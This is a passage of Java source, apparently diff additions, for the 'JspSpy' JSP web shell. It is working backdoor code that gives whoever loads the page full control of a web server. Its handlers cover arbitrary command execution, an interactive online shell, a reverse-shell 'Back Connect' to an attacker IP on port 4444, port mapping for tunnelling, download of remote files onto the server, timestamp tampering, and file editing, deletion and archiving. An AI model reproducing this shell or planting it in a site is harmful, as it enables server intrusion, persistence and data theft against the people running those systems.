    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { 
+output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("

    "); +out.println("
    ");
    +String command = request.getParameter("command");
    +if (!Util.isEmpty(command)) {
    +Process pro = Runtime.getRuntime().exec(command);
    +BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
    +String s = reader.readLine();
    +while (s != null) {
    +out.println(Util.htmlEncode(Util.getStr(s)));
    +s = reader.readLine();
    +}
    +reader.close();
    +out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); 
+} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void 
invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if 
(pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream 
output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); 
+remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); 
+JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

    System Environment >>


      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new 
